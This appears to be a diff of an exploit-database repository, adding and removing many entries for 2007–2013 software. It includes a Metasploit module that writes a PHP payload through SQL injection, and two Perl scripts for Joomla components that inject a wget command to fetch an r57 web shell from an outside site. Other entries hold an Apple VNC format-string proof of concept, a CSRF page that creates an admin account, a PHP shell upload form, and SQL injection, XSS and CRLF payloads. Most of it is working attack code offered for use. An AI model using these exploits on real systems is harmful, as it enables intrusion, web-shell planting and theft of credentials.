# Tested on: Debian 7 (Kernel 3.2.0), Kali (Kernel 3.7)
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Uptime Agent 5.0.1 Stack Overflow Vulnerability
Affected versions: Uptime Agent 5.0.1 (i386)
PDF:
http://www.security-assessment.com/files/documents/advisory/Up.Time%20Agent%205.0.1%20Stack%20Overflow.pdf
#!/usr/bin/python
#

15
platforms/linux/local/29954.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/23844/info
ELinks is prone to an arbitrary code-execution vulnerability.
An attacker can exploit this issue to potentially execute arbitrary code with the privileges of the user running the affected application.
This issue requires an attacker to trick an unsuspecting victim into running the vulnerable application in an attacker-controlled directory.
This issue affects ELinks 0.11.1; other versions may also be vulnerable.
$ mkdir -p /tmp/elinks/{run,po}
$ cp /usr/share/locale/fr/LC_MESSAGES/elinks.mo /tmp/elinks/po/fr.gmo
$ dd if=/dev/urandom of=/tmp/elinks/po/fr.gmo bs=1024 seek=1 count=200
$ cd /tmp/elinks/run

21
platforms/osx/remote/29168.pl
View file

@ -1,21 +0,0 @@
#!/usr/bin/perl
#
# For ARD (Apple Remote Desktop) authentication you must also specify a username.
# You must also install Crypt::GCrypt::MPI and Crypt::Random
# CVE: CVE-2013-5135
# Credit: S2 Crew [Hungary] - PZ
# Software: Apple Remote Desktop
# Vulnerable version: < 3.7
use Net::VNC;
$target = "192.168.1.4";
$password = "B"x64;
$a = "A"x32;
$payload = $a."%28\$n"; # is_exploitable=yes:instruction_disassembly=mov %ecx,(%rax):instruction_address=0x00007fff8e2a0321:access_type=write
print "Apple VNC Server @ $target\n";
print "Check the /var/log/secure.log file ;) \n";
$vnc = Net::VNC->new({hostname => $target, username => $payload, password => $password});
$vnc->login;

38
platforms/php/local/29317.txt
View file

@ -1,38 +0,0 @@
#Title: Bypass MOD_PHP Symlink From Sihosin Patch
#Description: Symlink Server By Escaping MOD_PHP and Turning off the Cross-user Security to any another Path.
#Data: 30/10/2013
#Auhor: Mauritania Attacker & Virusa Worm
#Greetz: All AnonGhost Memberz
/var/zpanel/hostdata/ ====> Path of Websites.
/zadmin/public_html/webmail_mydomain_com ====> our Target.
/var/zpanel/temp/ =====> Path where we can read our Bypass.
#For PHP Version 5
<IfModule mod_php5.c>
php_admin_value open_basedir
"/var/zpanel/hostdata/zadmin/public_html/webmail_mydomain_com:/var/zpanel/temp/"
php_admin_value suhosin.executor.func.blacklist "passthru, show_source, shell_exec, system, pcntl_exec, popen, pclose,
proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, apache_child_terminate, posix_kill,
posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg, exec" Options
FollowSymLinks Indexes AllowOverride All Order Allow,Deny Allow from all
</IfModule>
#For PHP Version 4
<IfModule mod_php4.c>
php_admin_value open_basedir
"/var/zpanel/hostdata/zadmin/public_html/webmail_mydomain_com:/var/zpanel/temp/"
php_admin_value suhosin.executor.func.blacklist "passthru, show_source, shell_exec, system, pcntl_exec, popen, pclose,
proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, apache_child_terminate, posix_kill,
posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg, exec" Options
FollowSymLinks Indexes AllowOverride All Order Allow,Deny Allow from all
</IfModule>

174
platforms/php/remote/30010.rb Executable file
View file

@ -0,0 +1,174 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Kimai v0.9.2 'db_restore.php' SQL Injection",
'Description' => %q{
This module exploits a SQL injection vulnerability in Kimai version
0.9.2.x. The 'db_restore.php' file allows unauthenticated users to
execute arbitrary SQL queries. This module writes a PHP payload to
disk if the following conditions are met: The PHP configuration must
have 'display_errors' enabled, Kimai must be configured to use a
MySQL database running on localhost; and the MySQL user must have
write permission to the Kimai 'temporary' directory.
},
'License' => MSF_LICENSE,
'Author' =>
[
'drone (@dronesec)', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB' => '25606'],
['OSVDB' => '93547'],
],
'Payload' =>
{
'Space' => 8000, # HTTP POST
'DisableNops'=> true,
'BadChars' => "\x00\x0a\x0d\x27"
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on Kimai versions 0.9.2.beta, 0.9.2.1294.beta, 0.9.2.1306-3
[ 'Kimai version 0.9.2.x (PHP Payload)', { 'auto' => true } ]
],
'Privileged' => false,
'DisclosureDate' => 'May 21 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Kimai', '/kimai/']),
OptString.new('FALLBACK_TARGET_PATH', [false, 'The path to the web server document root directory', '/var/www/']),
OptString.new('FALLBACK_TABLE_PREFIX', [false, 'The MySQL table name prefix string for Kimai tables', 'kimai_'])
], self.class)
end
#
# Checks if target is Kimai version 0.9.2.x
#
def check
print_status("#{peer} - Checking version...")
res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") })
if not res
print_error("#{peer} - Request timed out")
return Exploit::CheckCode::Unknown
elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/
version = "#{$1}"
print_good("#{peer} - Found version: #{version}")
if version >= "0.9.2" and version <= "0.9.2.1306"
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
def exploit
# Get file system path
print_status("#{peer} - Retrieving file system path...")
res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') })
if not res
fail_with(Failure::Unknown, "#{peer} - Request timed out")
elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/
path = "#{$1}"
print_good("#{peer} - Found file system path: #{path}")
else
path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path)
print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'")
end
# Get MySQL table name prefix from temporary/logfile.txt
print_status("#{peer} - Retrieving MySQL table name prefix...")
res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') })
if not res
fail_with(Failure::Unknown, "#{peer} - Request timed out")
elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/)
table_prefix = "#{prefixes.flatten.last}"
print_good("#{peer} - Found table name prefix: #{table_prefix}")
else
table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path)
print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'")
end
# Create a backup ID
print_status("#{peer} - Creating a backup to get a valid backup ID...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'db_restore.php'),
'vars_post' => {
'submit' => 'create backup'
}
})
if not res
fail_with(Failure::Unknown, "#{peer} - Request timed out")
elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/)
id = "#{backup_ids.flatten.last}"
print_good("#{peer} - Found backup ID: #{id}")
else
fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID")
end
# Write PHP payload to disk using MySQL injection 'into outfile'
fname = "#{rand_text_alphanumeric(rand(10)+10)}.php"
sqli = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- "
print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'db_restore.php'),
'vars_post' => Hash[{
'submit' => 'recover',
'dates[]' => sqli
}.to_a.shuffle]
})
if not res
fail_with(Failure::Unknown, "#{peer} - Request timed out")
elsif res.code == 200
print_good("#{peer} - Payload sent successfully")
register_files_for_cleanup(fname)
else
print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}")
end
# Remove the backup
print_status("#{peer} - Removing the backup...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'db_restore.php'),
'vars_post' => Hash[{
'submit' => 'delete',
'dates[]' => "#{id}"
}.to_a.shuffle]
})
if not res
print_warning("#{peer} - Request timed out")
elsif res.code == 302 and res.body !~ /#{id}/
vprint_good("#{peer} - Deleted backup with ID '#{id}'")
else
print_warning("#{peer} - Could not remove backup with ID '#{id}'")
end
# Execute payload
print_status("#{peer} - Retrieving file '#{fname}'...")
res = send_request_raw({
'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}")
}, 5)
end
end

21
platforms/php/webapps/29835.txt
View file

@ -1,21 +0,0 @@
#
# GeecomPromo 1.5 Multiple SQL Injection Vulnerability
# Author: ExploitsLab
# Vendor Homepage: http://www.geecom.org/
# Download: http://www.geecom.org/scaricaFile.php?id=4
# Version: 1.5
#
#### SQL injection notizie.php ####
[target]/notizie.php?id=-1+UNION+SELECT+0,0,admin_password,0,0+FROM+admin
#### SQL injection pagine.php ####
[target]/pagine.php?alias='+UNION+SELECT+0,0,0,0,0,admin_password,0,0,0,0,0,0,0+FROM+admin%23
#### SQL injection scaricaFile.php ####
[target]/scaricaFile.php?id=1+UNION+SELECT+0,0,admin_password,0,0+FROM+admin
CONTACT: andreascarpa9@gmail.com

103
platforms/php/webapps/29836.txt
View file

@ -1,103 +0,0 @@
###########################################################
[~] Exploit Title:appRain-v-3.0.2::stored XSS on multiple Parameters & CSRF
vulnerability's
[~] Author: sajith
[~] version: appRain-v-3.0.2
[~] vulnerable app link:http://www.apprain.com/download
###########################################################
1)Attacker can create new admin users by exploiting "Add New admin"
functionality via CSRF vulnerability in the Admin panel
POC:
<html lang="en">
<head>
<title>POC by Sajith Shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/appRain-v-3.0.2/admin/manage/add/"
id="formid" method="post">
<input type="hidden" name="data[Admin][f_name]" value="first_name" />
<input type="hidden" name="data[Admin][l_name]" value="last_name"/>
<input type="hidden" name="data[Admin][email]" value="test@test.com" />
<input type="hidden" name="data[Admin][username]" value="testing" />
<input type="hidden" name="data[Admin][password]" value="T#utw8on007" />
<input type="hidden" name="data[Admin][status]" value="Active" />
<input type="hidden" name="data[Admin][description]" value="testing" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
2)stored XSS in multiple parameter's:
steps:
1) log into the admin panel and access the link
http://127.0.0.1/cms/appRain-v-3.0.2/admin/manage/add
2)Input the payload in the "first name" and "last name" field
payload:"><img src=x onerror=prompt(1);>
3)click on manage Admins functionality to execute the payload.
request:
POST /cms/appRain-v-3.0.2/admin/manage/add/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/cms/appRain-v-3.0.2/admin/manage/add
Content-Length: 344
Cookie: PHPSESSID=84ceiepe7pus96194mbt9m6vf3
Pragma: no-cache
Cache-Control: no-cache
data%5BAdmin%5D%5Bf_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(1)%3B%3E&data%5BAdmin%5D%5Bl_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(2)%3B%3E&data%5BAdmin%5D%5Bemail%5D=testing%
40xyz.com
&data%5BAdmin%5D%5Busername%5D=test1&data%5BAdmin%5D%5Bpassword%5D=T%24asw123&data%5BAdmin%5D%5Bstatus%5D=Active&data%5BAdmin%5D%5Bdescription%5D=test
response:
<label for="input">First Name:</label>
</div>
<div class="input">
<input type="text" name="data[Admin][f_name]"
value=""><img src=x onerror=prompt(1);>" id="f_name" class="large
check_notempty" longdesc="Please enter first name" />
</div>
</div>
<div class="field">
<div class="label">
<label for="l_name">Last Name:</label>
</div>
<div class="input">
<input type="text" name="data[Admin][l_name]"
value=""><img src=x onerror=prompt(2);>" id="l_name" class="large
check_notempty" longdesc="Please enter last name" />
</div>
</div>
{#}Access the URL
http://127.0.0.1/cms/appRain-v-3.0.2/category/manage/blog-cat/update/6where
"blog category" "description" and "sort order" input fields are
vulnerable to stored xss

93
platforms/php/webapps/29837.txt
View file

@ -1,93 +0,0 @@
# Exploit Title : Open TestBed framework arbitrary file upload exploit
# Date : 26 November 2013
# Exploit Author : 3rr0r1046 IndiShell
# Vulnerable script link : https://github.com/mszczodrak/otf
# Tested on : Linux
#Category : Remote exploit
////////////////////
DESCRIPTION
////////////////////
The Open Testbed Framework (OTF) consists of a set of tools for rapid deployment of a Low-Power Wireless Network (LPWN) testbeds.
There is flaw in Open TestBed framework script which allows an attacker to upload php shell .
//////////////////
Prof of concept
//////////////////
https://github.com/mszczodrak/otf/blob/master/web/upload_file.php
this is the file which contains vulnerable code . During file upload script does not check for file extension and upload it to server
here is the vulnerable code
<?php
/*
Author: Marcin Szczodrak
Columbia University
Last Modified: 10/22/2012
*/
include("header.php");
file_exists("configuration.php") or die("Missing 'configuration.php' file. Please use 'configuration.php.example' as a template to create 'configuration.php'");
include("configuration.php");
$content = "<pre>";
$content = $content . "\t\tUploading Log<br />";
// Limit file size to 200KB
//$content = $content . "Z1: " . $_FILES["Z1_firmware"]["size"] . " TelosB: " . $_FILES["TelosB_firmware"]["size"];
if (($_FILES["Z1_firmware"]["size"] < $max_firmware_size) and ($_FILES["TelosB_firmware"]["size"] < $max_firmware_size))
{
if ($_FILES["Z1_firmware"]["error"] > 0)
{
$content = $content . "<b>Z1 firmware file is missing.</b>" . "<br />";
$content = $content . "<b>Error: " . $_FILES["Z1_firmware"]["error"] . "</b><br />";
}
else
{
$content = $content . "<b>Z1</b><br />";
$content = $content . "Upload: " . $_FILES["Z1_firmware"]["name"] . "<br />";
$content = $content . "Type: " . $_FILES["Z1_firmware"]["type"] . "<br />";
$content = $content . "Size: " . ($_FILES["Z1_firmware"]["size"] / 1024) . " Kb<br />";
$content = $content . "Stored in: " . $_FILES["Z1_firmware"]["tmp_name"] . "<br />";
move_uploaded_file($_FILES["Z1_firmware"]["tmp_name"],
$Z1_upload . $_FILES["Z1_firmware"]["name"] );
$content = $content . "Stored in: " . $Z1_upload . $_FILES["Z1_firmware"]["name"] . "<br />";
$fz = fopen($Z1_nodes, 'w');
fwrite($fz, $_POST['Z1_nodes']);
fclose($fz);
}
this code will let you upload any file having size below 200 kb and store it to 127.0.0.1/web/uploads/
if your shell name is shell.php , it will be stored in uploads folder with name Z1_shell.php
here is exploit code
==========================================================================================================================
<html>
<body >
<div align=center>
<font size=4 color=red face="comic sans ms"><img src="http://www.freesmileys.org/smileys/smiley-cool21.gif"> --==[[ code for India,Hack for India,Die for India ]]==-- <img src="http://www.freesmileys.org/smileys/smiley-flag010.gif"></font><br><br>
<form method=post action="http://127.0.0.1/otf-master/web/upload_file.php" enctype=multipart/form-data>
<br>Browse shell : <input type=file name="Z1_firmware">
  <input type=submit value="spin the shit">
</form>
</body></html>
============================================================================================================================
shell will be in directory
http://127.0.0.1/otf-master/web/uploads/
-==[[Greetz to]]==--
###########################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,
#Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,
#rad paul,Godzila,mike waals,zoo,cyber warrior,Neo hacker ICA,Suriya Prakash,cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR
#saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk,brown suger and rest of TEAM INDISHELL
--==[[Love to]]==--
# My Father , my Ex Teacher,GCE college ke DON,cold fire hacker,Mannu, ViKi,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo

59
platforms/php/webapps/29923.txt
View file

@ -1,59 +0,0 @@
#######################################################################
Ciaran McNally
Application: IP.Board
http://www.invisionpower.com/apps/board/
Versions: <= 3.4.6
Platforms: Windows, Mac, Linux
Bug: Simple Persistant XSS
Exploitation: WEB
Date: 27 November 2013.
Author: Ciaran McNally
Web: http://makthepla.net/blog/=/minor-xss-ip-board
My Twitter: https://twitter.com/ciaranmak
#######################################################################
1) Bug.
2) The exploit.
3) Fix.
#######################################################################
Forum software for thriving discussions.
#######################################################################
======
1) Bug
======
Javascript injection via a Website URL that is incorrectly sanitized.
Rating:Low severity.
#######################################################################
==============
2) The exploit
==============
Simply include "javascript:prompt(document.domain);//http://" in your
profile "Web Page" section. This is then saved as a link on your profile.
Javascript execution occurs when the link is clicked.
An attacker could store the victims cookie or possibly perform further
CSRF attacks on whoever is dumb enough to click the link.
#######################################################################
======
3) Fix
======
None as of yet...
#######################################################################
--
maK :)

28
platforms/php/webapps/29925.txt
View file

@ -1,28 +0,0 @@
#############################
# Exploit Title : Kleeja CRLF injection
# Author : Ashiyane Digital Security Team
# Software link: http://Kleeja.com
# Google Dork : intext:Kleeja ? 2007-2013. All rights reserved
# Date: 2013/11/26
# Version : 1.0.1 - 1.5.4
# Tested on: Windows 7 , Linux
##############
# This script is possibly vulnerable to CRLF injection attacks.
# The problem is located in the file:
# /install/index.php
#
# Suppose you run a vulnerable website that has a member section.
# An attacker will send an email to one of your members containing a
CRLF-crafted link.
# This link appears to be legitimate; after all it points to your own website.
# The link might look something like the one below:
# http://localhost/page.php?page=%0d%0aContent-Type:
text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:
text/html%0d%0a%0d%0a%3Chtml%3EAshiyane Content%3C/html%3E
#
##############
# Special Tnx to : Reza-S4T4N,C4T,Angel-D3m0n,V1R4N64R,
# Rz04,Ali_Eagle,HAMIDx9,Alireza666,ACC3SS ...
# --------------
# bY T3rm!nat0r5
###########################

4
platforms/php/webapps/29935.php
View file

@ -2,14 +2,12 @@
# Exploit Title: MyBB <= 1.6.11 Remote Code Execution Using Admin Privileges
# Date: 30/11/2013
# Exploit Author: BlackDream @ p0wnbox.com
# Google Dork: [if relevant] (we will automatically add these to the GHDB)
# Exploit Author: BlackDream
# Vendor Homepage: www.mybb.com
# Software Link: http://www.mybb.com/download/latest
# Version: <= 1.6.11
# Tested on: Linux
# Thanks to: UnderSec
# Thanks to: www.p0wnbox.com
/*
Ok guys here we are. In older versions of MyBB it was possible to execute PHP Code by injecting the php code into a template file.

136
platforms/php/webapps/29947.txt
View file

@ -1,136 +0,0 @@
#Title : Joomla com_alpahuserpoints Remote Code Execution
#Author : DevilScreaM
#Date : 1 Desember 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://alphaplug.com/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Remote Code Execution
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_alphauserpoints/assets/phpThumb/phpThumb.php??src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_alphauserpoints/assets/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_alphauserpoints/assets/phpThumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite =
"$target/components/com_alphauserpoints/assets/phpThumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}
==============================================================
Shell Access
http://TARGET/components/com_alphauserpoints/assets/phpthumb/shell.php

136
platforms/php/webapps/29948.txt
View file

@ -1,136 +0,0 @@
#Title : Joomla com_alphacontent Remote Code Execution
#Author : DevilScreaM
#Date : 1 Desember 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://alphaplug.com/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Remote Code Execution
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}
==============================================================
Shell Access
http://TARGET/components/com_alphacontent/assets/phpthumb/shell.php

9
platforms/php/webapps/29953.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23843/info
PHP Content Architect is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
PHP Content Architect 0.9 pre 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/[path]noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[shell]

12
platforms/php/webapps/29955.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/23845/info
The WF-Quote module for the Xoops CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
WF-Quote 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

9
platforms/php/webapps/29956.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23847/info
Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
This issue affects Mini Web Shop 2; other versions may also be affected.
http://remote-server/path/modules/order_form.php/[xss]

9
platforms/php/webapps/29957.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23847/info
Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
This issue affects Mini Web Shop 2; other versions may also be affected.
http://remote-server/path/modules/sendmail.php/[xss]

14
platforms/php/webapps/29960.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/23856/info
TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, bypass the authentication mechanism, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. Other attacks are also possible.
SunShop Shopping Cart v4 is reported vulnerable; other versions may also be affected.
<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
<input name="c" size=75 value="'">
<input name="pg" type="hidden" value="1">
<input name="l" type="hidden" value="product_list">
<input type=submit value="Execute SQL Injection on variable 'c' in index.php" class="button">
</form>

23
platforms/php/webapps/29961.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/23856/info
TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, bypass the authentication mechanism, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. Other attacks are also possible.
SunShop Shopping Cart v4 is reported vulnerable; other versions may also be affected.
<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
<input name="l" size=75 value="<script %0a%0d>alert(1);</script>">
<input name="remove[0]" type="hidden" value="off">
<input name="quantity[0:49]" type="hidden" value="1">
<input name="remove[1]" type="hidden" value="off">
<input name="quantity[1:50]" type="hidden" value="1">
<input name="remove[2]" type="hidden" value="off">
<input name="quantity[2:55]" type="hidden" value="1">
<input name="remove[3]" type="hidden" value="off">
<input name="quantity[3:42]" type="hidden" value="1">
<input name="remove[4]" type="hidden" value="off">
<input name="quantity[4:51]" type="hidden" value="1">
<input name="coupon" type="hidden" value="email@address.com">
<input type=submit value="Execute Attack on variable 'l' in index.php" class="button">
</form>

9
platforms/php/webapps/29963.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23864/info
Kayako eSupport is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Kayako eSupport 3.00.90 is vulnerable to this issue; other versions may also be affected.
http://example.com/index.php?_m="><script>alert(1);</script>

9
platforms/php/webapps/29965.txt Executable file
View file

@ -0,0 +1,9 @@
